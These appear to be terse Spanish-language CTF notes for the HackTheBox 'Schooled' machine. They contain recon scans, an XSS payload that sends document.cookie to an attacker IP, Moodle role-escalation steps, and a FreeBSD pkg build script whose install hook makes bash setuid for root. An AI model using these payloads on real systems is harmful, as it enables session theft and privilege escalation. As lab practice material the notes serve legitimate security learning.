echo "10.129.170.50 schooled.htb www.schooled.htb" | sudo tee -a /etc/hostsnmap -A -p- -oA schooled 10.129.170.50 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA schooled 10.129.170.50
nmap -sU -O -p- -oA schooled-udp 10.129.170.50
nikto -h 10.129.170.50:80
gobuster dir -k -u http://10.129.170.50/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
wfuzz -c -u "http://schooled.htb/" -H "Host:FUZZ.schooled.htb" -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt --hl 461
Agregamos moodle.schooled.htb a etc/hosts
Jamie Borham
Lianne Carter
Jane Higgins
Manuel Phillips
Me meto en matematicas y le doy click a enroll me
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
https://raw.githubusercontent.com/lnxg33k/misc/master/XSS-cookie-stealer.py
No me sirvio. PUse esto en el moodlenet textbox
<script>new Image().src="http://10.10.14.1/bogus.php?output="+document.cookie;</script>
cambiar userlist a 24 y roletoassign a 1
metemos a lian carter como estudiante
le damos click a lian carter y log in as
vamos a define roles
#!/bin/sh
STAGEDIR=~/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
chmod +s /usr/local/bin/bash
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: [https://doe.it](https://link.zhihu.com/?target=https%3A//doe.it)
prefix: /
EOF
mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .